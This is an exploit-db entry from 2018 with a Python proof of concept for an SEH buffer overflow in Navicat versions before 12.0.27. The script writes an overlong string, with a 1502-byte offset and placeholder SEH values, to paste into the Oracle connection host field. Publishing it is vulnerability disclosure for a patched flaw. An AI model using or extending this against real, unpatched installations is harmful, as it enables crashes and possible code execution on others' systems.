Navicat < 12.0.27 - Oracle Connection Overflow

  • Author: Kevin McGuigan
    Date: 2018-04-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/44558/

    #!/usr/bin/python
    # Title: Navicat < 12.0.27 Oracle Connection Overflow
    # Author: Kevin McGuigan
    # Twitter: @_h3xagram
    # Author Website: https://www.7elements.co.uk
    # Vendor Website: https://www.navicat.com
    # Date: 27/04/2018
    # Version: 12.0.26
    # Tested on Windows 7 32-bit
    # Vendor notified on 04/04/2018. Patch issued on 25/04/2018.

    # Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow.
    filename = "navicatPOC.txt"

    # Padding that precedes the SEH record
    junk = "A" * 1502
    #nseh = "\x4C\x4C\x77\x04"
    #seh= "\x75\x2a\x01\x10"
    # Placeholder markers for the next-SEH pointer and the SEH handler
    nseh = "B" * 4
    seh = "C" * 4
    # Trailing filler after the SEH record
    fill = "D" * 4000
    buffer = junk + nseh + seh + fill

    # Write the test string to disk so it can be pasted into the host field
    with open(filename, 'w') as textfile:
        textfile.write(buffer)